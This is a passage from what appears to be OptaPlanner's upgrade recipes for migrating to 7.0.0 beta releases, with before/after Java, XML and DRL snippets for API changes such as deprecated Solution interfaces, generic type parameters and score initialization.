return facts;\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\n@PlanningSolution\npublic class CloudBalance {\n\n private List<CloudComputer> computerList;\n ...\n\n private HardSoftScore score;\n\n @ValueRangeProvider(id = \"computerRange\")\n @ProblemFactCollectionProperty\n public List<CloudComputer> getComputerList() {...}\n\n @PlanningScore\n public HardSoftScore getScore() {...}\n public void setScore(HardSoftScore score) {...}\n\n}\n----\n\nFor a single problem fact (which is not wrapped in a `Collection`), use the `@ProblemFactProperty` annotation,\nas shown below (with field annotations this time).\n\nBefore in `*.java`:\n[source, java]\n----\n@PlanningSolution\npublic class CloudBalance implements Solution<HardSoftScore> {\n\n private CloudParametrization parametrization;\n private List<CloudBuilding> buildingList;\n @ValueRangeProvider(id = \"computerRange\")\n private List<CloudComputer> computerList;\n ...\n\n public Collection<? extends Object> getProblemFacts() {\n List<Object> facts = new ArrayList<Object>();\n facts.add(parametrization); \/\/ not a Collection\n facts.addAll(buildingList);\n facts.addAll(computerList);\n ...\n return facts;\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\n@PlanningSolution\npublic class CloudBalance {\n\n @ProblemFactProperty\n private CloudParametrization parametrization;\n @ProblemFactCollectionProperty\n private List<CloudBuilding> buildingList;\n @ValueRangeProvider(id = \"computerRange\")\n @ProblemFactCollectionProperty\n private List<CloudComputer> computerList;\n ...\n\n}\n----\n\nDon't add the `@ProblemFactCollectionProperty` annotation on getters (or fields)\nthat have a `@PlanningEntityCollectionProperty` annotation.\n\n\n[.upgrade-recipe-minor.upgrade-recipe-public-api]\n=== `Solver`: return values no longer implement `Solution`\n\nBecause the `Solution` interface was deprecated (see the section below to upgrade from 6.4.0.Final to 7.0.0.Beta1),\nthe `Solver.solve(...)` and `Solver.getBestSolution()` methods now return an `Object` instead of a `Solution` instance\n(if and only if no type parameter is specified for the `Solver`).\n\n*This only applies if you're still using a `Solver` without a type parameter\nand if you're not casting the return value immediately to your solution implementation (which is unlikely).*\n\nBefore in `*.java`:\n[source, java]\n----\nSolution s = solver.solve(problem);\nCloudBalance solution = (CloudBalance) s;\n----\n\nAfter in `*.java` (quick and dirty fix):\n[source, java]\n----\nCloudBalance solution = (CloudBalance) solver.solve(problem);\n----\n\nAfter in `*.java` (recommended fix):\n[source, java]\n----\nSolverFactory<CloudBalance> factory = SolverFactory.createFromXmlResource(...);\nSolver<CloudBalance> solver = factory.buildSolver();\n...\nCloudBalance solution = solver.solve(problem);\n----\n\n\n[.upgrade-recipe-minor.upgrade-recipe-public-api]\n=== `BestSolutionChangedEvent.getNewBestSolution()`: return value no longer implements `Solution`\n\nBecause the `Solution` interface was deprecated (see the section below to upgrade from 6.4.0.Final to 7.0.0.Beta1),\nthe `BestSolutionChangedEvent.getNewBestSolution()` method now returns an `Object`\n(if and only if no type parameter is specified for the `SolverEventListener`).\n\n*This only applies if you're still using a `SolverEventListener` without a type parameter\nand if you're not casting the return value immediately to your solution implementation (which is unlikely).*\n\nBefore in `*.java`:\n[source, java]\n----\nSolverFactory factory = SolverFactory.createFromXmlResource(...);\nSolver solver = factory.buildSolver();\nsolver.addEventListener(new SolverEventListener() {\n @Override\n public void bestSolutionChanged(BestSolutionChangedEvent event) {\n Solution s = event.getNewBestSolution();\n CloudBalance solution = (CloudBalance) s;\n ...\n }\n});\n----\n\nAfter in `*.java`:\n[source, java]\n----\nSolverFactory<CloudBalance> factory = SolverFactory.createFromXmlResource(...);\nSolver<CloudBalance> solver = factory.buildSolver();\nsolver.addEventListener(new SolverEventListener<CloudBalance>() {\n @Override\n public void bestSolutionChanged(BestSolutionChangedEvent<CloudBalance> event) {\n CloudBalance solution = event.getNewBestSolution();\n ...\n }\n});\n----\n\nAnd you'll probably want to use a lambda here:\n\n[source, java]\n----\nSolverFactory<CloudBalance> factory = SolverFactory.createFromXmlResource(...);\nSolver<CloudBalance> solver = factory.buildSolver();\nsolver.addEventListener(event -> {\n CloudBalance solution = event.getNewBestSolution();\n ...\n});\n----\n\n\n[.upgrade-recipe-major]\n=== `SolutionFileIO`: added optional generic type parameter\n\nTo avoid the awkward cast to your `Solution` implementation and to get rid of that deprecated interface,\n`SolutionFileIO` now optionally supports a generic type parameter (which is the solution class).\n\nBefore in `*.java`:\n[source, java]\n----\npublic class TspFileIO implements SolutionFileIO {\n ...\n\n public Solution read(File inputSolutionFile) {...}\n\n public void write(Solution solution, File outputSolutionFile) {\n TspSolution tspSolution = (TspSolution) solution;\n ...\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class TspFileIO implements SolutionFileIO<TspSolution> {\n ...\n\n public TspSolution read(File inputSolutionFile) {...}\n\n public void write(TspSolution tspSolution, File outputSolutionFile) {\n ...\n }\n\n}\n----\n\n\n[.upgrade-recipe-minor]\n=== `XStreamSolutionFileIO`: added optional generic type parameter\n\nTo avoid the awkward cast to your `Solution` implementation and to get rid of that deprecated interface,\n`XStreamSolutionFileIO` now optionally supports a generic type parameter (which is the solution class).\n\nBefore in `*.java`:\n[source, java]\n----\nSolutionFileIO solutionFileIO = new XStreamSolutionFileIO(CloudBalance.class);\n----\n\nAfter in `*.java`:\n[source, java]\n----\nSolutionFileIO<CloudBalance> solutionFileIO = new XStreamSolutionFileIO<>(CloudBalance.class);\n----\n\n\n[.upgrade-recipe-minor]\n=== `SelectionFilter`: added generic type parameter\n\nTo avoid the awkward cast to your `Solution` implementation,\na `SelectionFilter` now also has a generic type parameter for the solution, not just the selection type.\n\nBefore in `*.java`:\n[source, java]\n----\npublic class LectureFilter implements SelectionFilter<Lecture> {\n\n public boolean accept(ScoreDirector scoreDirector, Lecture lecture) {\n ...\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class LectureFilter implements SelectionFilter<CourseSchedule, Lecture> {\n\n @Override\n public boolean accept(ScoreDirector<CourseSchedule> scoreDirector, Lecture lecture) {\n ...\n }\n\n}\n----\n\n\n[.upgrade-recipe-minor]\n=== `CustomPhaseCommand`: added optional generic type parameter\n\nTo avoid the awkward cast to your `Solution` implementation and to get rid of that deprecated interface,\n`CustomPhaseCommand` now optionally supports a generic type parameter (which is the solution class).\n\nBefore in `*.java`:\n[source, java]\n----\npublic class DinnerPartySolutionInitializer extends AbstractCustomPhaseCommand {\n\n public void changeWorkingSolution(ScoreDirector scoreDirector) {\n DinnerParty dinnerParty = (DinnerParty) scoreDirector.getWorkingSolution();\n ...\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class DinnerPartySolutionInitializer extends AbstractCustomPhaseCommand<DinnerParty> {\n\n public void changeWorkingSolution(ScoreDirector<DinnerParty> scoreDirector) {\n DinnerParty dinnerParty = scoreDirector.getWorkingSolution();\n ...\n }\n\n}\n----\n\n\n[.upgrade-recipe-major]\n=== `ProblemFactChange`: added optional generic type parameter\n\nTo avoid the awkward cast to your `Solution` implementation and to get rid of that deprecated interface,\n`ProblemFactChange` now optionally supports a generic type parameter (which is the solution class).\n\nBefore in `*.java`:\n[source, java]\n----\n solver.addProblemFactChange(new ProblemFactChange() {\n public void doChange(ScoreDirector scoreDirector) {\n CloudBalance cloudBalance = (CloudBalance) scoreDirector.getWorkingSolution();\n ...\n }\n });\n----\n\nAfter in `*.java`:\n[source, java]\n----\n solver.addProblemFactChange(new ProblemFactChange<CloudBalance>() {\n public void doChange(ScoreDirector<CloudBalance> scoreDirector) {\n CloudBalance cloudBalance = scoreDirector.getWorkingSolution();\n ...\n }\n });\n----\n\nAfter in `*.java` (with lambda):\n[source, java]\n----\n solver.addProblemFactChange(scoreDirector -> {\n CloudBalance cloudBalance = scoreDirector.getWorkingSolution();\n ...\n });\n----\n\n\n[.upgrade-recipe-minor]\n=== `Bendable*Score`: `toString()` changed\n\nA bendable score (`BendableScore`, `BendableLongScore` or `BendableBigDecimalScore`)'s `String`\nhas changed so it can be parsed without the ScoreDefinition.\n\nBefore in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <termination>\n <bestScoreLimit>0\/0\/-1\/-2\/-3<\/bestScoreLimit>\n <\/termination>\n----\n\nAfter in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <termination>\n <bestScoreLimit>[0\/0]hard\/[-1\/-2\/-3]soft<\/bestScoreLimit>\n <\/termination>\n----\n\nBefore in XStream `*.xml` output with `optaplanner-persistence-xstream`:\n[source, xml]\n----\n <score>0\/0\/-1\/-2\/-3<\/score>\n----\n\nAfter in in XStream `*.xml` output with `optaplanner-persistence-xstream`:\n[source, xml]\n----\n <score>[0\/0]hard\/[-1\/-2\/-3]soft<\/score>\n----\n\n\n[.upgrade-recipe-major]\n=== `EnvironmentMode`: `PRODUCTION` renamed\n\nThe `EnvironmentMode` `PRODUCTION` has been renamed to `NON_REPRODUCIBLE`\nbecause most enterprises use `REPRODUCIBLE` in production and that's fine.\nFor backwards compatibility, `PRODUCTION` still exists, but it's deprecated and it will be removed in a future version.\n\nBefore in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n<solver>\n <environmentMode>PRODUCTION<\/environmentMode>\n ...\n<\/solver>\n----\n\nAfter in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n<solver>\n <environmentMode>NON_REPRODUCIBLE<\/environmentMode>\n ...\n<\/solver>\n----\n\n\n[.upgrade-recipe-readme]\n=== Average calculate count renamed to score calculation speed\n\nIn the logs and the benchmark report, the _average calculate count per second_ has been renamed to _score calculation speed_.\n\n\n[.upgrade-recipe-minor]\n=== `Termination`: `calculateCountLimit` renamed\n\nThe termination configuration property `calculateCountLimit` has been renamed to `scoreCalculationCountLimit`.\nThe property `calculateCountLimit` has been deprecated and will be removed in a future version.\n\nBefore in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <termination>\n <calculateCountLimit>100000<\/calculateCountLimit>\n <\/termination>\n----\n\nAfter in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <termination>\n <scoreCalculationCountLimit>100000<\/scoreCalculationCountLimit>\n <\/termination>\n----\n\n\n[.upgrade-recipe-minor]\n=== `ProblemStatisticType`: `CALCULATE_COUNT_PER_SECOND` renamed\n\nThe benchmark ProblemStatisticType `CALCULATE_COUNT_PER_SECOND` has been renamed to `SCORE_CALCULATION_SPEED`.\n\nBefore in `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <problemStatisticType>CALCULATE_COUNT_PER_SECOND<\/problemStatisticType>\n----\n\nAfter in `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <problemStatisticType>SCORE_CALCULATION_SPEED<\/problemStatisticType>\n----\n\n\n[.upgrade-recipe-readme]\n=== `Score`: uninitialized variable count\n\nA solution's `Score` now also contains the number of uninitialized variables (usually `0`) as a negative `getInitScore()`.\nThis is useful in exotic cases with multiple phases to fully initialize a solution.\nIt also prevents bugs in multithreaded use cases.\n\nWith `Score.isSolutionInitialized()`, it's now possible to quickly and reliably determine if a solution is fully initialized.\nThe method `FeasibilityScore.isFeasible()` now also checks if the solution was fully initialized during score calculation.\n\n\n[.upgrade-recipe-major.upgrade-recipe-reverted]\n=== `EasyScoreCalculator`: `calculateScore()` changed\n\n*This change has been reverted in version 7.0.0.Beta6. Ignore this item if you're upgrading directly to that version or higher.*\n\nThe `EasyScoreCalculator` interface method `calculateScore(solution)` has been changed to `calculateScore(solution, initScore)`.\nChange the method signature to add the `initScore` and then pass it to the `Score.valueOf()` method.\n\nBefore in `*.java`:\n[source, java]\n----\npublic class CloudBalancingEasyScoreCalculator implements EasyScoreCalculator<CloudBalance> {\n\n public HardSoftScore calculateScore(CloudBalance cloudBalance) {\n ...\n return HardSoftScore.valueOf(hardScore, softScore);\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class CloudBalancingEasyScoreCalculator implements EasyScoreCalculator<CloudBalance> {\n\n public HardSoftScore calculateScore(CloudBalance cloudBalance, int initScore) {\n ...\n return HardSoftScore.valueOf(initScore, hardScore, softScore);\n }\n\n}\n----\n\nOptaPlanner keeps track of the `initScore` internally, but it needs to be passed into the `Score` creation because a `Score` is immutable by design.\n\n\n[.upgrade-recipe-minor.upgrade-recipe-reverted]\n=== `IncrementalScoreCalculator`: `calculateScore()` changed\n\n*This change has been reverted in version 7.0.0.Beta6. Ignore this item if you're upgrading directly to that version or higher.*\n\nThe `IncrementalScoreCalculator` interface method `calculateScore()` has been changed to `calculateScore(initScore)`.\nChange the method signature to add the `initScore` and then pass it to the `Score.valueOf()` method.\n\nBefore in `*.java`:\n[source, java]\n----\npublic class CloudBalancingIncrementalScoreCalculator extends AbstractIncrementalScoreCalculator<CloudBalance> {\n\n public HardSoftScore calculateScore() {\n return HardSoftScore.valueOf(hardScore, softScore);\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class CloudBalancingIncrementalScoreCalculator extends AbstractIncrementalScoreCalculator<CloudBalance> {\n\n public HardSoftScore calculateScore(int initScore) {\n return HardSoftScore.valueOf(initScore, hardScore, softScore);\n }\n\n}\n----\n\n\n[.upgrade-recipe-major.upgrade-recipe-public-api.upgrade-recipe-reverted]\n=== `Score`: `valueOf(...)` changed and `valueOfInitialized(...)` added\n\n*This change has been reverted in version 7.0.0.Beta6. Ignore this item if you're upgrading directly to that version or higher.\nInstead, the method `valueOfUninitialized(...)` has been added, but that doesn't affect your code.*\n\nEach `Score` implementation now requires an `initScore` parameter.\nInside a `ScoreCalculator`, the `initScore` must be passed from the `calculateScore()` method (see the 2 previous notes above).\n\nOutside of a `ScoreCalculator`, if you're constructing a score for an initialized solution,\njust replace `valueOf()` with `valueOfInitialized()`:\n\nBefore in `*.java`:\n[source, java]\n----\n SimpleScore score = SimpleScore.valueOf(1234);\n----\n\nAfter in `*.java`:\n[source, java]\n----\n SimpleScore score = SimpleScore.valueOfInitialized(1234);\n----\n\nOr with a `HardSoftScore`:\n\nBefore in `*.java`:\n[source, java]\n----\n HardSoftScore score = HardSoftScore.valueOf(1200, 34);\n----\n\nAfter in `*.java`:\n[source, java]\n----\n HardSoftScore score = HardSoftScore.valueOfInitialized(1200, 34);\n----\n\nIt is intentional that `valueOfInitialized()` doesn't just overload `valueOf()`,\nto avoid that an `EasyScoreCalculator` implementation forgets to pass the `initScore` parameter.\n\n\n[.upgrade-recipe-major]\n=== `BestSolutionChangedEvent`: `isNewBestSolutionInitialized()` replaced\n\nThe method `BestSolutionChangedEvent.isNewBestSolutionInitialized()`\nhas been deprecated in favor of `BestSolutionChangedEvent.getNewBestSolution().getScore().isSolutionInitialized()`.\n\nBefore in `*.java`:\n[source, java]\n----\n public void bestSolutionChanged(BestSolutionChangedEvent<CloudBalance> event) {\n if (event.isEveryProblemFactChangeProcessed()\n && event.isNewBestSolutionInitialized()) {\n ...\n }\n }\n----\n\nAfter in `*.java`:\n[source, java]\n----\n public void bestSolutionChanged(BestSolutionChangedEvent<CloudBalance> event) {\n if (event.isEveryProblemFactChangeProcessed()\n && event.getNewBestSolution().getScore().isSolutionInitialized()) {\n ...\n }\n }\n----\n\nHowever, if you also check `isFeasible()`, that's enough because it now also checks if the solution is initialized.\n\nAfter in `*.java` for a `FeasibleScore`:\n[source, java]\n----\n public void bestSolutionChanged(BestSolutionChangedEvent<CloudBalance> event) {\n if (event.isEveryProblemFactChangeProcessed()\n \/\/ isFeasible() checks isSolutionInitialized() too\n && event.getNewBestSolution().getScore().isFeasible()) {\n ...\n }\n }\n----\n\n\n[.upgrade-recipe-minor.upgrade-recipe-reverted]\n=== Custom initializer: `Score.compareTo()` behaviour changed\n\n*This change has been reverted in version 7.0.0.Beta6. Ignore this item if you're upgrading directly to that version or higher.*\n\nThe `Score.compareTo()` now also takes the uninitialized variable count into account.\nIf you have a `CustomPhaseCommand` that implements a custom solution initializer (instead of using a Construction Heuristic),\nit will need to transform all scores with `Score.toInitializedScore()` before comparison to avoid making the wrong decision:\n\nBefore in `*.java`:\n[source, java]\n----\npublic class DinnerPartySolutionInitializer extends AbstractCustomPhaseCommand<DinnerParty> {\n ...\n\n private void initializeSeatDesignationList(ScoreDirector<DinnerParty> scoreDirector, DinnerParty dinnerParty) {\n ...\n for (SeatDesignation seatDesignation : dinnerParty.getSeatDesignationList()) {\n Score bestScore = SimpleScore.valueOf(Integer.MIN_VALUE);\n ...\n for (Seat seat : undesignatedSeatList) {\n ...\n if (score.compareTo(bestScore) > 0) {\n bestScore = score;\n ...\n }\n }\n ...\n }\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class DinnerPartySolutionInitializer extends AbstractCustomPhaseCommand<DinnerParty> {\n ...\n\n private void initializeSeatDesignationList(ScoreDirector<DinnerParty> scoreDirector, DinnerParty dinnerParty) {\n ...\n for (SeatDesignation seatDesignation : dinnerParty.getSeatDesignationList()) {\n Score bestScore = SimpleScore.valueOfInitialized(Integer.MIN_VALUE);\n ...\n for (Seat seat : undesignatedSeatList) {\n ...\n if (score.toInitializedScore().compareTo(bestScore.toInitializedScore()) > 0) {\n bestScore = score;\n ...\n }\n }\n ...\n }\n }\n\n}\n----\n\n\n[.upgrade-recipe-minor]\n=== `Score` and `ScoreDefinition`: methods changed\n\nThe `ScoreDefinition.fromLevelNumbers(...)` method now requires an `initScore` parameter.\n\nBefore in `*.java`:\n[source, java]\n----\nScore score = scoreDefinition.fromLevelNumbers(new int[]{0, -200});\n----\n\nAfter in `*.java` (quick and dirty fix):\n[source, java]\n----\nScore score = scoreDefinition.fromLevelNumbers(0, new int[]{0, -200});\n----\n\n\n[.upgrade-recipe-minor]\n=== Custom `Score`: methods added\n\nIf you have a custom `Score`:\nThe `Score` interface has several new methods: `getInitScore()`, `isSolutionInitialized()`, `toInitializedScore()` and `withInitScore()`.\nThe first two methods are implemented by `AbstractScore`, but the last two methods need to be specifically implemented.\n\nBefore in `*.java`:\n[source, java]\n----\npublic final class HardSoftScore extends AbstractScore<HardSoftScore> ... {\n ...\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic final class HardSoftScore extends AbstractScore<HardSoftScore> ... {\n ...\n\n public HardSoftScore toInitializedScore() {\n return initScore == 0 ? this : new HardSoftScore(0, hardScore, softScore);\n }\n\n public HardSoftScore withInitScore(int newInitScore) {\n assertNoInitScore();\n return new HardSoftScore(newInitScore, hardScore, softScore);\n }\n\n}\n----\n\nFurthermore, a score that implements `FeasibleScore` needs to take the `initScore` into account in the `isFeasible()` method implementation.\n\n\n[.upgrade-recipe-minor]\n=== Hibernate integration: extra `@Column` needed\n\nBecause a `Score` now also contains an `initScore` of type `int` (regardless of the type of the other fields),\nadd an extra `@Column` annotation to the beginning of the `@Columns` list to map that field to a database column.\n\nSet it to `0` for all existing records (unless you have reason to believe that some scores weren't calculated on a fully initialized solution).\n\nBefore in `*.java`:\n[source, java]\n----\n @Columns(columns = {\n @Column(name = \"hardScore\"),\n @Column(name = \"softScore\")})\n public HardSoftScore getScore() {\n return score;\n }\n----\n\nAfter in `*.java`:\n[source, java]\n----\n @Columns(columns = {\n @Column(name = \"initScore\"),\n @Column(name = \"hardScore\"),\n @Column(name = \"softScore\")})\n public HardSoftScore getScore() {\n return score;\n }\n----\n\n\n[.upgrade-recipe-impl-detail]\n=== `XStreamSolutionFileIO`: no-arg constructor removed\n\nThe no-arg constructor of `XStreamSolutionFileIO` has been removed because it's useless.\n\n\n[.upgrade-recipe-minor]\n=== JAXB support added\n\nIf you're using JAXB, take advantage the new JAXB Score bindings etc.\nSee the reference manual, chapter _Integration_.\n\nThese new `ScoreJaxbXmlAdapter` implementations have been promoted to the public API,\nso they are guaranteed to be backwards compatible in future versions.\n\n\n[.upgrade-recipe-minor]\n=== Jackson support added\n\nIf you're using Jackson, take advantage the new Jackson Score bindings etc.\nSee the reference manual, chapter _Integration_.\n\nThese new `ScoreJacksonJsonSerializer` and `ScoreJacksonJsonDeserializer` implementations have been promoted to the public API,\nso they are guaranteed to be backwards compatible in future versions.\n\n\n[.upgrade-recipe-major]\n=== `XStreamScoreConverter` replaced\n\nThe general purpose `XStreamScoreConverter` to bind `Score` implementations\nhas been replaced by specific implementations, such as `HardSoftScoreXStreamConverter` and `SimpleScoreXStreamConverter`\nthat are easier to use.\n\nFurthermore, these new `ScoreXStreamConverter` implementations have been promoted to the public API,\nso they are now guaranteed to be backwards compatible in future versions.\n\nBefore in `*.java`:\n[source, java]\n----\npublic class CloudBalance {\n\n @XStreamConverter(value = XStreamScoreConverter.class, types = {HardSoftScoreDefinition.class})\n private HardSoftScore score;\n\n ...\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class CloudBalance {\n\n @XStreamConverter(HardSoftScoreXStreamConverter.class)\n private HardSoftScore score;\n\n ...\n}\n----\n\nFor a bendable score, it's no longer needed to configure the `hardLevelSize` and `softLevelSize`.\n\nBefore in `*.java`:\n[source, java]\n----\npublic class Schedule {\n\n @XStreamConverter(value = XStreamScoreConverter.class, types = {BendableScoreDefinition.class}, ints = {1, 2})\n private BendableScore score;\n\n ...\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class Schedule {\n\n @XStreamConverter(BendableScoreXStreamConverter.class)\n private BendableScore score;\n\n ...\n}\n----\n\n\n[.upgrade-recipe-major.upgrade-recipe-public-api]\n=== `@CustomShadowVariable`: `sources` type changed\n\nA shadow variable annotated with `@CustomShadowVariable`\nnow expects that the `sources` parameter is of type `@PlanningVariableReference`\ninstead of `@CustomShadowVariable.Source`.\n\nThis way it's consistent with the `variableListenerRef` parameter.\n\nBefore in `*.java`:\n[source, java]\n----\n @CustomShadowVariable(variableListenerClass = ArrivalTimeUpdatingVariableListener.class,\n sources = {@CustomShadowVariable.Source(variableName = \"previousStandstill\")})\n public Long getArrivalTime() {\n return arrivalTime;\n }\n----\n\nAfter in `*.java`:\n[source, java]\n----\n @CustomShadowVariable(variableListenerClass = ArrivalTimeUpdatingVariableListener.class,\n sources = {@PlanningVariableReference(variableName = \"previousStandstill\")})\n public Long getArrivalTime() {\n return arrivalTime;\n }\n----\n\n\n== From 7.0.0.Beta1 to 7.0.0.Beta2\n\n[.upgrade-recipe-minor]\n=== `ProblemFactChange`: `before\/afterProblemFactChanged` renamed\n\nThe `ScoreDirector` methods `beforeProblemFactChanged()` and `afterProblemFactChanged()`\nhave been renamed to `beforeProblemPropertyChanged()` and `afterProblemPropertyChanged()`.\nThis can affect your `ProblemFactChange` implementations.\n\nA problem fact is a class that doesn't change during planning.\nA problem property is a property on a problem fact or a planning entity that doesn't change during planning\n(so it's not a planning variable).\n\nBefore in `*.java`:\n[source, java]\n----\n scoreDirector.beforeProblemFactChanged(computer);\n computer.setMemory(newMemoryCapacity);\n scoreDirector.afterProblemFactChanged(computer);\n----\n\nAfter in `*.java`:\n[source, java]\n----\n scoreDirector.beforeProblemPropertyChanged(computer);\n computer.setMemory(newMemoryCapacity);\n scoreDirector.afterProblemPropertyChanged(computer);\n----\n\n\n[.upgrade-recipe-major]\n=== Solver configuration: `<scoreDefinitionType>` removed\n\nDon't specify the `scoreDefinitionType` in the solver configuration any more\nbecause OptaPlanner will now figure it out automatically from the domain.\n\nBefore in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <scoreDirectorFactory>\n <scoreDefinitionType>HARD_SOFT<\/scoreDefinitionType>\n <scoreDrl>org\/optaplanner\/examples\/cloudbalancing\/solver\/cloudBalancingScoreRules.drl<\/scoreDrl>\n <\/scoreDirectorFactory>\n----\n\nAfter in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <scoreDirectorFactory>\n <scoreDrl>org\/optaplanner\/examples\/cloudbalancing\/solver\/cloudBalancingScoreRules.drl<\/scoreDrl>\n <\/scoreDirectorFactory>\n----\n\nFor a bendable score, also move the `bendableHardLevelsSize` and `bendableSoftLevelsSize` lines from the solver configuration XML\ninto the `@PlanningScore` annotation on your domain class.\n\nBefore in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <scoreDirectorFactory>\n <scoreDefinitionType>BENDABLE<\/scoreDefinitionType>\n <bendableHardLevelsSize>1<\/bendableHardLevelsSize>\n <bendableSoftLevelsSize>2<\/bendableSoftLevelsSize>\n <scoreDrl>org\/optaplanner\/examples\/projectjobscheduling\/solver\/projectJobSchedulingScoreRules.drl<\/scoreDrl>\n <\/scoreDirectorFactory>\n----\n\nAfter in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <scoreDirectorFactory>\n <scoreDrl>org\/optaplanner\/examples\/projectjobscheduling\/solver\/projectJobSchedulingScoreRules.drl<\/scoreDrl>\n <\/scoreDirectorFactory>\n----\n\nBefore in `*.java`:\n[source, java]\n----\n @PlanningScore\n private BendableScore score;\n----\n\nAfter in `*.java`:\n[source, java]\n----\n @PlanningScore(bendableHardLevelsSize = 1, bendableSoftLevelsSize = 2)\n private BendableScore score;\n----\n\nIn the rare case that you're using a custom score, also move its declaration into the domain:\n\nAfter in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <scoreDefinitionClass>...MyCustomScoreDefinition<\/scoreDefinitionClass>\n----\n\nAfter in `*.java`:\n[source, java]\n----\n @PlanningScore(scoreDefinitionClass = MyCustomScoreDefinition.class)\n----\n\n[.upgrade-recipe-minor.upgrade-recipe-public-api]\n=== `@PlanningVariable` on primitive types: no longer supported\n\nA `@PlanningVariable` annotation on a primitive type such as `int` or `long` (instead of `Integer` or `Long`)\nnow fails fast instead of causing an inferior result.\nThe use of a primitive type caused the Construction Heuristics to presume the variable is already initialized\n(because it's not null and it might be form of Repeated Planning),\nwhich lead to inferior results.\nIt was hard to diagnose the cause of that issue for many users, so now this inferior approach fails fast with a clear message.\n\nBefore in `*.java`:\n[source, java]\n----\n private int delay;\n\n @PlanningVariable(valueRangeProviderRefs = {\"delayRange\"})\n public int getDelay() {\n return delay;\n }\n\n public void setDelay(int delay) {\n this.delay = delay;\n }\n----\n\nAfter in `*.java`:\n[source, java]\n----\n private Integer delay;\n\n @PlanningVariable(valueRangeProviderRefs = {\"delayRange\"})\n public Integer getDelay() {\n return delay;\n }\n\n public void setDelay(Integer delay) {\n this.delay = delay;\n }\n----\n\n\n[.upgrade-recipe-minor]\n=== `VariableListener` events are no longer unique\n\nOptaPlanner might call the `before...` and `after...` methods on your `VariableListener` implementation\ntwice with the exact same parameters.\nMost `VariableListener` implementations can deal with this,\ngetting a small performance boost because OptaPlanner doesn't have to guarantee uniqueness.\nIf your implementation can't deal with it, then overwrite the `requiresUniqueEntityEvents()` method.\n\nBefore in `*.java`:\n[source, java]\n----\npublic class StartTimeUpdatingVariableListener implements VariableListener<Task> {\n\n ...\n}\n----\n\nAfter in `*.java` (optional):\n[source, java]\n----\npublic class StartTimeUpdatingVariableListener implements VariableListener<Task> {\n\n @Override\n public boolean requiresUniqueEntityEvents() {\n \/\/ If you don't need to overwrite this method, you get a small performance gain\n return true;\n }\n\n ...\n}\n----\n\n\n[.upgrade-recipe-recommended]\n=== Faster and nicer `accumulate()` in `drl`\n\nDrools now uses typed `sum()`, `min()`, `max()` and `avg()` functions in `accumulate()` patterns.\nThis means that a sum of ints is now an int (instead of a double) and a sum of BigDecimals is now a BigDecimal (without rounding errors).\nThis is faster and it also gets rid of the `intValue()` conversions.\n\nMeanwhile, also take advantage of migrating to the clearer `accumulate` form, if you haven't already.\n\nBefore in `*.drl`:\n[source, drl]\n----\nrule \"requiredCpuPowerTotal\"\n when\n $c : CloudComputer($capacity : cpuPower)\n $total : Number(intValue > $capacity) from accumulate(\n CloudProcess(\n computer == $c,\n $required : requiredCpuPower),\n sum($required)\n )\n then\n scoreHolder.addHardConstraintMatch(kcontext, $capacity - $total.intValue());\nend\n----\n\nAfter in `*.drl`:\n[source, drl]\n----\nrule \"requiredCpuPowerTotal\"\n when\n $c : CloudComputer($capacity : cpuPower)\n accumulate(\n CloudProcess(\n computer == $c,\n $required : requiredCpuPower);\n $total : sum($required);\n $total > $capacity\n )\n then\n scoreHolder.addHardConstraintMatch(kcontext, $capacity - $total);\nend\n----\n\nNotice that the pattern, the function list and the DRL constraint list in the `accumulate()`\nare recommended to be separated by a `;` character instead of a `,` character.\n\n\n[.upgrade-recipe-minor]\n=== Custom `Score`: implement `isCompatibleArithmeticArgument()`\n\nAn `AbstractScore` no longer implements the `Score` interface method `isCompatibleArithmeticArgument()` (which is still there).\nNow, your custom `Score` implementation needs to implement it itself.\n\nThis way, `Score` instances can be reused by GWT and other JavaScript generating code.\n\nBefore in `*.java`:\n[source, java]\n----\npublic final class HardSoftScore extends AbstractScore<HardSoftScore> {\n ...\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic final class HardSoftScore extends AbstractScore<HardSoftScore> {\n ...\n\n @Override\n public boolean isCompatibleArithmeticArgument(Score otherScore) {\n return otherScore instanceof HardSoftScore;\n }\n\n}\n----\n\n\n== From 7.0.0.Beta2 to 7.0.0.Beta3\n\n[.upgrade-recipe-minor]\n=== `Solver.getScoreDirectorFactory`: call `ScoreDirector.dispose()`\n\nEvery `ScoreDirector` needs to be disposed to avoid a potential memory leak.\nThe old docs didn't clearly mention that, so your code might not do that.\n\nBefore in `*.java`:\n[source, java]\n----\nScoreDirectorFactory<CloudBalance> scoreDirectorFactory = solver.getScoreDirectorFactory();\nScoreDirector<CloudBalance> guiScoreDirector = scoreDirectorFactory.buildScoreDirector();\n...\n----\n\nAfter in `*.java`:\n[source, java]\n----\nScoreDirectorFactory<CloudBalance> scoreDirectorFactory = solver.getScoreDirectorFactory();\nScoreDirector<CloudBalance> guiScoreDirector = 